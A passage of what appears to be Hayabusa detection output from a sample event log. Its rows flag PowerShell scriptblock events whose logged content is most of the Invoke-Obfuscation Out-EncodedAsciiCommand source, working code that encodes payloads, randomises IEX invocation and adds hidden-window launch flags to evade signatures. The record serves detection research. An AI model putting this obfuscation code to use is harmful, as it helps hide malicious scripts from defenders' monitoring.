$ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input 